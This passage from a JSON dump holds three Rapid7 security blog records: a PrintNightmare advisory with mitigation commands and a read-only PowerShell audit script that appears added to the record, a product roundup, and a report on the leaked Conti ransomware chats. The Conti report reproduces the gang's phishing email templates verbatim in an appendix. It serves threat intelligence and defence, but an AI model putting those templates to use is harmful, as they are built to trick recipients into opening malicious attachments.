According to Microsoft's updated advisory, "the security updates released on and after July 6, 2021 contain protections for CVE-2021-1675 and the additional remote code execution exploit in the Windows Print Spooler service known as \u201cPrintNightmare\u201d, documented in CVE-2021-34527." Exploitation in the wild has been detected, and ALL Windows systems are affected\u2014not just domain controllers.\n\n**As of July 7, 2021, multiple community researchers have disputed the efficacy of Microsoft's out-of-band fixes for CVE-2021-34527, noting that the local privilege escalation (LPE) vector may not have been addressed, and while the July 6 updates may have remediated the original MS-RPRN vector for remote code execution, RCE is [still possible using MS-PAR](<https://twitter.com/gentilkiwi/status/1411792763478233091>) with Point and Print enabled.** Several prominent researchers have tested ongoing exploitability, including [Will Dormann of CERT/CC](<https://twitter.com/wdormann/status/1412813044279910416>) and Mimikatz developer [Benjamin Delpy](<https://twitter.com/gentilkiwi/status/1412771368534528001>). 
Dormann [tweeted](<https://twitter.com/wdormann/status/1412813044279910416>) on July 7, 2021 just after noon EDT that "If you have a system where PointAndPrint NoWarningNoElevationOnInstall = 1, then Microsoft's patch for #PrintNightmare CVE-2021-34527 does nothing to prevent either LPE or RCE."\n\nRapid7 researchers have confirmed that Metasploit and other public proof-of-concept code is still able to achieve remote code execution using both MS-RPRN and the UNC path bypass _as long as Point and Print is enabled._ When Point and Print is disabled using the guidance below, public exploit code fails to achieve remote code execution.\n\nTo fully remediate PrintNightmare CVE-2021-34527, Windows administrators should review Microsoft's guidance in [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>), install the out-of-band updates released July 6, 2021, and disable Point and Print. Microsoft also recommends restricting non-administrators from installing any signed or unsigned printer drivers on printer servers. See the **Mitigation Guidance** section below for detailed guidance.\n\n**6 July 2021**: Since this blog was initially posted, additional information has become available. Microsoft has issued a new advisory and assigned a new CVE ID to the PrintNightmare vulnerability: [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). \nThe new guidance recommends disabling the print spooler, as we initially recommended, and also contains instructions to disable inbound remote printing through Group Policy.\n\nThese are only workarounds and a patch remains unavailable at this time. \nSince this vulnerability has no patch and multiple proofs-of-concept are freely available, we recommend implementing a workaround mitigation as soon as possible. 
We advise following one of the two workarounds on all Domain Controllers and any other Windows machines\u2014servers or clients\u2014which meet either of the following criteria:\n\n 1. Point and Print is enabled\n 2. The Authenticated Users group is nested within any of the groups that are listed in the [mitigation section of Microsoft's advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\nFrom a technical standpoint, additional information from Cube0x0 and Benjamin Delpy suggests that `RpcAddPrinterDriver` is not the only vulnerable function: the Win32 `AddPrinterDriverEx` function will also work. Some proofs of concept used only the RPRN `RpcAddPrinterDriver` function and did not work on certain machines; others have been demonstrated to work on servers and clients other than domain controllers using `AddPrinterDriverEx`. This has also been referred to as "SharpPrintNightmare".\n\n## Mitigation Guidance\n\nUp until July 6, 2021, the most effective mitigation strategy was to disable the print spooler service itself. Since July 6, Microsoft's guidance on remediating CVE-2021-34527 has undergone several revisions. Updated mitigation guidance is below, and we have also preserved our original guidance on disabling the print spooler service. The Microsoft Security Response Center [published a blog](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>) with the details below on July 8, 2021.\n\n**As of July 9, 2021:** \nTo fully remediate CVE-2021-34527, Windows administrators should review Microsoft's guidance in [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) and do the following:\n\n 1. Install the cumulative update released July 6, 2021.\n 2. 
Disable Point and Print by setting the following registry keys to `0` (or ensuring they are not present):\n * `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall = 0` (DWORD) or not defined (default setting) **and**\n * `UpdatePromptSettings = 0` (DWORD) or not defined (default setting)\n 3. Configure the `RestrictDriverInstallationToAdministrators` registry value to prevent non-administrators from installing printer drivers on a print server. Setting this value to 1 or any non-zero value prevents a non-administrator from installing any signed or unsigned printer driver on a printer server. Administrators can install both a signed or unsigned printer driver on a print server.\n\n**Note:** This guidance has been revised and reflects new information published by Microsoft on July 8, 2021. Previously, Microsoft's guidance had been that Point and Print could be disabled by setting the `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall` and `NoWarningNoElevationOnUpdate` registry keys to `0`. As of July 9, 2021, this information is outdated and Windows customers should use the [revised guidance](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>).\n\nAfter installing the July 2021 out-of-band update, all users will be either administrators or non-administrators. Delegates will no longer be honored. See [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) for further information.\n\nIf your organization does not require printing to conduct business operations, you may also disable the print spooler service. This should be done on all endpoints, servers, and especially domain controllers. 
Dedicated print servers may still be vulnerable if the spooler is not stopped. Microsoft [security guidelines](<https://docs.microsoft.com/en-us/windows-server/security/windows-services/security-guidelines-for-disabling-system-services-in-windows-server#print-spooler>) do not recommend disabling the service across all domain controllers, since the active directory has no way to remove old queues that no longer exist unless the spooler service is running on at least one domain controller in each site. However, until this vulnerability is effectively patched, this should have limited impact compared to the risk.\n\nOn Windows cmd:\n \n \n net stop spooler\n \n\nOn PowerShell:\n \n \n Stop-Service -Name Spooler -Force\n Set-Service -Name Spooler -StartupType Disabled\n \n\nThe following PowerShell commands can be used to help find exploitation attempts:\n \n \n Get-WinEvent -LogName 'Microsoft-Windows-PrintService/Admin' | Select-String -InputObject {$_.message} -Pattern 'The print spooler failed to load a plug-in module'\n \n \n \n Get-WinEvent -FilterHashtable @{Logname='Microsoft-Windows-PrintService/Operational';ID=316} | Select-Object *\n \n\n## Rapid7 Customers\n\nWe strongly recommend that all customers either install the July 6, 2021 out-of-band updates **and** disable Point and Print via the two registry keys detailed in the `Mitigation Guidance` section above, **OR** disable the Windows Print Spooler service altogether on an emergency basis to mitigate the immediate risk of exploitation. InsightVM and Nexpose customers can assess their exposure to CVE-2021-34527 with authenticated checks in the July 8, 2021 content release. Checks look for the out-of-band patches Microsoft issued on July 6, 2021 and additionally ensure that Point and Print has been disabled in customer environments. 
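The mitigation steps and event-log hunts above can be audited in one pass. The following is an added example, not Rapid7's or Microsoft's code: a read-only PowerShell script that reports whether a host is mitigated either by the July 6 update plus Point and Print disabled, or by a disabled Spooler, and counts the two event-log indicators. It assumes an elevated session on Windows with PowerShell 5 or later, and that `RestrictDriverInstallationToAdministrators` lives under the same `PointAndPrint` key as the other two values (the page names only the value).

```powershell
# Added example (not Rapid7's or Microsoft's code): read-only audit of one Windows host
# against the July 8, 2021 PrintNightmare guidance. Nothing here changes configuration.
# Assumes an elevated PowerShell 5+ session (Get-Service StartType, HKLM read access).

$PointAndPrintKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
$OobUpdateDate    = Get-Date '2021-07-06'   # out-of-band updates shipped this day

function Get-RegistryDword {
    param([string]$Path, [string]$Name)
    # $null means "not defined", which is the safe default for every value checked here.
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.$Name
}

function Test-PointAndPrintDisabled {
    # Revised guidance: BOTH values must be 0 or absent. Note the second value is
    # UpdatePromptSettings, not the NoWarningNoElevationOnUpdate named in earlier guidance.
    $install   = Get-RegistryDword -Path $PointAndPrintKey -Name 'NoWarningNoElevationOnInstall'
    $update    = Get-RegistryDword -Path $PointAndPrintKey -Name 'UpdatePromptSettings'
    $okInstall = ($null -eq $install) -or ($install -eq 0)
    $okUpdate  = ($null -eq $update)  -or ($update  -eq 0)
    [pscustomobject]@{
        NoWarningNoElevationOnInstall = $install
        UpdatePromptSettings          = $update
        Disabled                      = ($okInstall -and $okUpdate)
    }
}

function Test-DriverInstallRestricted {
    # Assumption: the value sits under the same PointAndPrint key. Any non-zero value
    # prevents non-administrators from installing printer drivers (step 3 above).
    $value = Get-RegistryDword -Path $PointAndPrintKey -Name 'RestrictDriverInstallationToAdministrators'
    [pscustomobject]@{ Value = $value; Restricted = (($null -ne $value) -and ($value -ne 0)) }
}

function Get-SpoolerState {
    $svc = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $status    = if ($svc) { [string]$svc.Status }    else { 'NotInstalled' }
    $startType = if ($svc) { [string]$svc.StartType } else { 'NotInstalled' }
    # "Disabled" in the sense of the guidance: stopped now AND not coming back at boot.
    $disabled  = (-not $svc) -or ($status -eq 'Stopped' -and $startType -eq 'Disabled')
    [pscustomobject]@{ Status = $status; StartType = $startType; Disabled = $disabled }
}

function Get-SpoolerPluginLoadFailures {
    # Admin log: the message text the hunt above searches for. Operational log: event 316.
    # The Operational log is often disabled, so zero hits there is not proof of absence.
    $admin = Get-WinEvent -LogName 'Microsoft-Windows-PrintService/Admin' -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'The print spooler failed to load a plug-in module' }
    $oper = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PrintService/Operational'; Id = 316 } -ErrorAction SilentlyContinue
    [pscustomobject]@{ AdminPluginFailures = @($admin).Count; OperationalId316 = @($oper).Count }
}

function Get-PrintNightmareAuditReport {
    $pnp     = Test-PointAndPrintDisabled
    $restr   = Test-DriverInstallRestricted
    $spooler = Get-SpoolerState
    $events  = Get-SpoolerPluginLoadFailures
    # Heuristic only: KB numbers differ per OS build, so look for any fix installed on or
    # after the July 6, 2021 release rather than a specific KB (confirm with your scanner).
    $patched = @(Get-HotFix -ErrorAction SilentlyContinue |
        Where-Object { $_.InstalledOn -and $_.InstalledOn -ge $OobUpdateDate }).Count -gt 0
    [pscustomobject]@{
        ComputerName            = $env:COMPUTERNAME
        SpoolerDisabled         = $spooler.Disabled
        PointAndPrintDisabled   = $pnp.Disabled
        DriverInstallRestricted = $restr.Restricted
        PostJuly6UpdatePresent  = $patched
        # Either path from the guidance is acceptable; Spooler running with Point and Print
        # enabled is exactly the state the July 7 community findings flagged as exposed.
        Mitigated               = ($spooler.Disabled -or ($patched -and $pnp.Disabled))
        AdminPluginLoadFailures = $events.AdminPluginFailures
        OperationalId316Events  = $events.OperationalId316
    }
}

Get-PrintNightmareAuditReport | Format-List
```

A non-zero value in either event count on a host that reports `Mitigated = False` is a host to triage first, since the plug-in load failure is what a failed or successful driver-load attempt leaves behind.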
InsightVM and Nexpose checks for CVE-2021-1675 were [released earlier in June](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-1675/>).\n\nVelociraptor users can use [this artifact](<https://docs.velociraptor.app/exchange/artifacts/pages/printnightmare/>) and [this artifact](<https://docs.velociraptor.app/exchange/artifacts/pages/printnightmaremonitor/>) to hunt for .dll files dropped during PrintNightmare exploitation. An exploit module is also available to Metasploit Pro customers.\n\nWe will continue to update this blog as further information comes to light.", "cvss3": {}, "published": "2021-06-30T18:15:59", "type": "rapid7blog", "title": "CVE-2021-34527 (PrintNightmare): What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1675", "CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-06-30T18:15:59", "id": "RAPID7BLOG:45A121567763FF457DE6E50439C2605A", "href": "https://blog.rapid7.com/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-08T15:44:47", "description": "\n\nIn today's post, we're giving a rundown of new features and functionality launched in Q3 2021 for [InsightVM](<https://www.rapid7.com/products/insightvm/>) and the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>). We hope you can begin to leverage these changes to drive success across your organization.\n\n## Apple Silicon support on the Insight Agent\n\nWe're excited to announce that the Insight Agent now natively supports Apple Silicon chips!\n\nApple announced the first generation Apple Silicon chip \u2014 the M1 processor \u2014 in November 2020. 
This chip is the new standard on all MacBooks starting with the 2020 releases, and Apple plans to transition completely to Apple Silicon chips over the next two years.\n\nThe new Mac installer specifically designed for the Apple Silicon can be accessed right from Agent Management in the platform, in the download section. Learn more in our [Apple Silicon Agent Support blog post](<https://www.rapid7.com/blog/post/2021/07/08/apple-m1-support-on-insight-agent/>).\n\n## Asset and Vulnerability Details reports\n\nThis new feature allows you to easily communicate details of your assets and vulnerabilities with stakeholders in a PDF format. Simply click the **Export to PDF** button on the Vulnerability Details page, and you'll have a PDF ready to share!\n\nThis is particularly useful if you're attempting to collaborate while remediating a specific vulnerability. We'll use a hypothetical security engineer named Jane to illustrate this.\n\nJane recently read about a new ransomware strain that leverages a specific vulnerability as part of an attack chain that seems to be targeting the industry of her organization. She opens the query builder in InsightVM, constructs a search query to identify the vulnerability by CVE, and discovers several instances. She wants to mention this during her morning all-hands sync so she can recruit other team members to her effort. She exports the vulnerability details page to a PDF, which allows her to share this out and provide more details to interested team members, who then can help her remediate this vulnerability much more quickly.\n\nMoreover, while undertaking this effort, another team member \u2014 Bill \u2014 finds an asset that seems to be a complete tragedy in terms of patching and vulnerability prevalence. He creates the Asset Details report and shares this in an e-mail to his team, stating that this asset seems to be missing their organization's patch cycle. 
He also suggests that they look for more of these types of assets because he knows that when there is one offender, there are often many.\n\n## Snyk integration for reporting vulnerabilities\n\nContainer Security assessments will now report Ruby vulnerabilities through an integration with the Snyk vulnerability database. This adds RubyGems packages to our Snyk-based coverage, which currently includes vulnerability detections for Java, JavaScript, and Python libraries. This integration is particularly helpful for organizations that perform scanning of Container Images at rest, in both public and private registries.\n\n## Emergent threat coverage recap\n\nQ3 2021 was another busy quarter for high-priority cybersecurity threats. As part of our emergent threat response process, Rapid7's VRM research and engineering teams released vulnerability checks and in-depth technical analysis to help InsightVM customers understand the risk of exploitation and assess their exposure to critical security threats. In July, [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare/rapid7-analysis?referrer=blog>), dubbed \u201c[PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)\" presented remediation challenges for many organizations amid active exploitation of the Windows Print Spooler service. In August, the [ProxyShell](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis?referrer=blog>) exploit chain put on-premises instances of Microsoft Exchange Server [at risk](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>) for remote code execution. 
More recently, widespread attacks took advantage of [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>), a critical flaw in[ Confluence Server & Confluence Data Center](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>), to deploy cryptominers, exfiltrate data, and obtain initial access for ransomware operations.\n\nOther notable emergent threats included:\n\n * [ForgeRock Access Manager/OpenAM Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464)](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-access-manager-cve-2021-35464/rapid7-analysis?referrer=blog>)\n * [SolarWinds Serv-U FTP and Managed File Transfer (CVE-2021-35211)](<https://www.rapid7.com/blog/post/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/>)\n * [Microsoft SAM File Readability (CVE-2021-36934)](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>)\n * [PetitPotam: Novel Attack Chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>)\n * [Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>)\n * [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>)\n\n## Stay tuned!\n\nAs always, we're continuing to work on exciting product enhancements and releases throughout the year. 
Keep an eye on our blog and [release notes](<https://docs.rapid7.com/release-notes/insightvm/>) as we continue to highlight the latest in vulnerability management at Rapid7.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-08T13:30:00", "type": "rapid7blog", "title": "What's New in InsightVM: Q3 2021 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-22005", "CVE-2021-26084", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35464", "CVE-2021-36934", "CVE-2021-40539"], "modified": "2021-10-08T13:30:00", "id": "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "href": "https://blog.rapid7.com/2021/10/08/whats-new-in-insightvm-q3-2021-in-review/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-09T17:28:27", "description": "\n\n**_UPDATE: _**_As of March 2, 2022, Conti began taking down exposed infrastructure as a result of the chat disclosure. 
At that time, we assessed that due to their sophisticated capability, deep funding, and quick recovery from exposed infrastructure in November 2021, they remained an active and significant threat. As of March 9, 2022, our threat intelligence team has observed a resumption of normal operations from Conti._\n\nOn February 27, Twitter user [@ContiLeaks](<https://twitter.com/contileaks>) released a trove of chat logs from the ransomware group, Conti \u2013 a sophisticated ransomware group whose manual was publicly [leaked last year](<https://blog.talosintelligence.com/2021/09/Conti-leak-translation.html>). Ahead of the chat log disclosures, Conti pledged their support for the Russian Government following the Russian invasion of Ukraine. However, a number of members sided with Ukraine, causing strife within the organization. Two days later, Conti posted a second message revising their statement to condemn the war and to strike back only if Russian critical infrastructure is targeted.\n\n_Conti announcement of support for Russian government_\n\n_Conti walk-back of their support for Russia_\n\n_@ContiLeaks announcement of the release_\n\nAt the time of the leak, a file titled `1.tgz` was released on the \u201cAnonFiles\u201d website, containing 14 megabytes of chat logs across 393 JSON files. However, some of the messages were encrypted and could not be read, so the information provided is necessarily incomplete. The remaining files contained internal Conti communications, screenshots of tools, and discussions of their exploits and design processes. \n\nOn February 28 and March 1, a bevy of additional files were posted, along with a number of pro-Ukraine tweets. Among both sets of leaked messages, there were a number of usernames and passwords for a variety of accounts. Additionally, user @ContiLeaks shared access details for a number of alleged Conti command and control servers, plus storage servers for stolen files. 
However, we have not accessed any of the data necessitating access to remote servers or the use of usernames and passwords, and we strongly recommend against doing so. \n\n@ContiLeaks also shared a file that they purport to be the source code for the Conti ransomware but declined to share the password except with \u201ctrusted parties.\u201d @ContiLeaks did, however, name one alleged Conti developer, providing their email address and Github. The scale of the leaked information suggests that the leaker is likely either a very senior member of the group or a coalition of disgruntled Conti affiliates.\n\n## Conti is a business \u2013 and a well-funded one\n\nMuch of the discussion within the chat logs concerns fairly mundane things \u2013 interviewing potential operators of the group, payment for services, out-of-office messages, gossip, and discussions of products. Based on the leaked chats, the Conti interview process actually looks a lot like a standard technical interview, with coding exercises to be performed hosted on public code repositories, salary negotiations, and the status of ongoing products. \n\nIn addition to other financial information related to specific actors, the leaked chats have revealed Conti\u2019s primary Bitcoin address, which contains over **two billion USD** as of February 28, 2022. Moreover, a conversation on April 9, 2021 between \u201cmango\u201d and \u201cjohnyboy77\u201d indicates Russian FSB involvement in some portion of their funding and that the FSB were interested in files from the media outlet Bellingcat on \u201cNavalny\u201d \u2013 an apparent reference to Alexei Navalny, the currently imprisoned opposition leader in Russia.\n\n## Conti development\n\nConti seems to operate much like a software company \u2013 the chat logs disclose concerns with the development of specific features for targets and a particular difficulty in encrypting very large files. 
The Conti team also attempted to get demos of popular endpoint detection software with the intent to develop their malware to avoid detection.\n\nTwo of the actors, \u201clemur\u201d and \u201cterry\u201d shared phishing templates (included verbatim in Appendix B at the end of this post) to be used against potential targets. Conti gains initial access in many ways, with phishing a popular line of attack due in part to its relatively high efficacy and low cost. Conti often uses phishing emails to establish a presence on targeted networks.\n\nA screenshot of the Conti control panel was also leaked, showing a number of compromised hosts and a breakdown of the operating systems, antiviruses, user rights, and detailed information about the infected assets.\n\n_Conti control panel_\n\nFurther discussions detailed the use of infrastructure against targets, disclosing a number of both known and unknown Conti command and control domains. At the time of this post, only a small number of the previously unknown command and control domains appear to be active. Conversations between two operators, \u201cStern\u201d and \u201cBentley\u201d discuss the use of third parties for malicious documents, favoring certain providers over others. They also discuss logistics for how to deliver ransomware without being detected by dynamic analysis. In a conversation between the two back in June of 2021, Stern discloses that Conti wants to start their own cryptocurrency but does not know who to work with. There is no evidence that anything came of this desire, and Conti continues to use Bitcoin for their ransoms. \n\n## Other groups assert they are strictly business\n\nIn stark contrast to Conti, other groups have made it clear to the public that despite their \u201cbusiness model,\u201d they take no public stance on this crisis. LockBit is remaining aloof from the conflict and made it clear that they intend to operate as usual. 
Although it is believed that LockBit is a Russian organization, they assert that \u201cwe are all simple and peaceful people, we are all Earthlings,\u201d and \u201cfor us it is just business and we are all apolitical.\u201d Another ransomware group, ALPHV, claims to be \u201cextremely saddened\u201d by Conti\u2019s pledge of support and condemns Conti. Their message concludes, \u201cThe Internet, and even more so its dark side, is not the place for politics.\u201d\n\n## Rumors of Conti\u2019s demise have been greatly exaggerated\n\nConti\u2019s payment and \u201csupport\u201d portal is still live, even following the infighting and leaks. Conti has repeatedly proven to be one of the most capable ransomware actors and these chats indicate that the group is well-organized and still very well-funded despite the schism. Any suggestion that these leaks spell the end for Conti is overstated, and we expect that Conti will continue to be a powerful player in the ransomware space.\n\n## What you can do\n\nWe are keeping an eye on dark web activity related to Conti and other ransomware groups and want to reiterate the following steps for protecting yourself from ransomware: \n\n\n * User education, especially related to well-crafted phishing campaigns\n * Asset and vulnerability management, including reducing your external attack surface\n * Multi-factor authentication \n\n\nAdditionally, it is worth ensuring that you are well-guarded against the exploits and malware commonly used by Conti (vulnerabilities provided in Appendix A at the end of this post). Furthermore, security teams should also take some time to review [CISA\u2019s recent report on the group](<https://www.cisa.gov/uscert/ncas/alerts/aa21-265a>). For further discussion on how to protect yourself from ransomware, see our [ransomware playbook](<https://www.rapid7.com/solutions/ransomware/>). 
\n\n\n## Appendix A \u2013 Conti known exploited vulnerabilities\n\nCVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146 (MS17-010; EternalBlue/EternalSynergy/EternalChampion)\n\nCVE-2020-1472 (ZeroLogon)\n\nCVE-2021-34527 (PrintNightmare)\n\nCVE-2021-44228 (Log4Shell)\n\nCVE-2021-34473, CVE-2021-34523, CVE-2021-31207 (ProxyShell)\n\n## Appendix B \u2013 Phishing templates\n\n_The templates are reproduced as leaked. The Cyrillic all-caps words are the operator\u2019s placeholders (\u041d\u041e\u041c\u0415\u0420 \u041f\u041b\u0410\u0422\u0415\u0416\u0410 = payment number, \u041d\u041e\u041c\u0415\u0420 \u0418\u041d\u0412\u041e\u0419\u0421\u0410 = invoice number, \u041d\u041e\u041c\u0415\u0420 \u041f\u0415\u0420\u0415\u0412\u041e\u0414\u0410 = transfer number, \u0421\u0423\u041c\u041c\u0410 = amount, \u041d\u041e\u041c\u0415\u0420 \u0427\u0415\u041a\u0410 = receipt number, \u041d\u041e\u041c\u0415\u0420 \u0417\u0410\u041a\u0410\u0417\u0410 = order number); \u0422: and \u0422\u0415\u041c\u042b: (subjects) introduce subject lines, D: and \u0410\u0422\u0422\u0410\u0427\u0418: (attachments) the attachment names._\n\n{Greetings|Hello|Good afternoon|Hi|Good day|Greeting|Good morning|Good evening}! \n{Here|Right here|In this letter|With this letter} we {send|direct} you {all the|all the necessary|the most important} {documentation|papers|documents|records} {regarding|concerning|relating to} your {payment|deposit payment|last payment} {#|\u2116|No. }\u041d\u041e\u041c\u0415\u0420 \u041f\u041b\u0410\u0422\u0415\u0416\u0410, right {as we|as we have} {discussed|revealed} {not so long ago|not too long ago|recently|just recently|not long ago}. Please {review the|check the|take a look at} \u0430ll {necessary|required|important} {information|data} in the {file attached|attached file}. \n\u0422: {Payment|Deposit payment} {invoice|receipt} {#|\u2116|No. }\u041d\u041e\u041c\u0415\u0420 \u0418\u041d\u0412\u041e\u0419\u0421\u0410 {prepared|formed} \nD: {payment|deposit|dep|paym}_{info|information|data}\n\n{Hello|Greetings|Greetings to you|Good evening|Good morning|Good day|Good afternoon}{!|,|.|} \nYour {order|purchase order|online order} was {successfully|correctly|timely} {paid|compensated|covered} by you {yesterday|today|recently}. Your {documentation|docs|papers} and {bank check|receipt|paycheck} {can be found|are listed} in the {attached file|file attached}. \nT: {Invoice|Given invoice|Bill} {we|we have|we\u2019ve} {sent|mailed|delivered} to you {is paid|is covered|is processed}. 
\nD: {Purchase order|Order} {verification|approval}\n\n{Hello|Greetings|Greetings to you|Good evening|Good morning|Good day|Good afternoon}{!|,|.|} \n{We are contacting you to|This is to|This mail is to} {notify|remind} you {about|regarding} your {debt|unprocessed payment} for {our last|the recent|our recent} {contract|agreement}. All {compensation|payment} {data|information}, {agreement|contract} and prepared legal {documents|documentation} {can be found|are located} in the {file attached|attached file}. \nT: {Missing|Additional} payment {information|details|info} reminder \nD: {Contract|Agreement} 2815/2 {case|claim}\n\n{Hello|Greetings|Greetings to you|Good evening|Good morning|Good day|Good afternoon}{!|,|.|} \n{Your payment|Your advance payment|Your obligatory payment|Payment you sent|Payment you made} was {successfully|correctly|timely|properly} {achieved|accomplished|approved|affirmed|received|obtained|collected|processed}. All {required documentation|necessary documents|important documentation|documents you need|details that can be important|essential documents} {can be found|you can find} in the {attached file|file attached}. \nT: {Invoicing|Invoice|Agreement|Contract|Payment} {info|data|information|details} \nD: {Receipt|Bill} {id|ID|Number|number|No.|No.|No|#|##} 3212-inv8\n\n{Greetings|Hello|Good day|Good afternoon}{!|,|} \n{Thank you for|We are thankful for|We are grateful for|Many thanks for} {your|your recent} {on-line order|purchase order|order}. {We|Our financiers have|Our team has|We have|Our shop has} {received|collected|processed|checked} your {payment|advance payment|money transfer|funds transfer} \u041d\u041e\u041c\u0415\u0420 \u041f\u0415\u0420\u0415\u0412\u041e\u0414\u0410. Now we {are and ready to|begin to} {pack|prepare|compose} your {shipment|order|box}. Your {parcel|packet|shipment|box} {will|is going to|would} {arrive|be delivered} to {you|your residence} within {4|5|6|four|five|six} {days|business days}. 
\n{Total|Full|Whole} {order|purchase|payment} sum: \u0421\u0423\u041c\u041c\u0410 \nYou {can find|will find} {all|full} {relative information|order info|order and payment details} and your {receipt|check} \u041d\u041e\u041c\u0415\u0420 \u0427\u0415\u041a\u0410 {in|in the} {attached file|file attached}. \n{Thank you!|Have a nice day!} \n\u0422\u0415\u041c\u042b: Your {order|purchase|on-line order|last order} \u041d\u041e\u041c\u0415\u0420 \u0417\u0410\u041a\u0410\u0417\u0410 payment {processed|obtained|received} \n\u0410\u0422\u0422\u0410\u0427\u0418: \nord_conf \nfull.details \ncompl_ord_7847 \nbuyer_auth_doc \ninfo_summr \ncustomer_docs \nspec-ed_info\n\n \n_**Additional reading**_\n\n * _[Russia/Ukraine Conflict: What Is Rapid7 Doing to Protect My Organization?](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-conflict-what-is-rapid7-doing-to-protect-my-organization/>)_\n * _[Staying Secure in a Global Cyber Conflict](<https://www.rapid7.com/blog/post/2022/02/25/russia-ukraine-staying-secure-in-a-global-cyber-conflict/>)_\n * _[Prudent Cybersecurity Preparation for the Potential Russia-Ukraine Conflict](<https://www.rapid7.com/blog/post/2022/02/15/prudent-cybersecurity-preparation-for-the-potential-russia-ukraine-conflict/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-03-01T19:15:58", "type": "rapid7blog", "title": "Conti Ransomware Group Internal Chats Leaked Over Russia-Ukraine Conflict", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", 
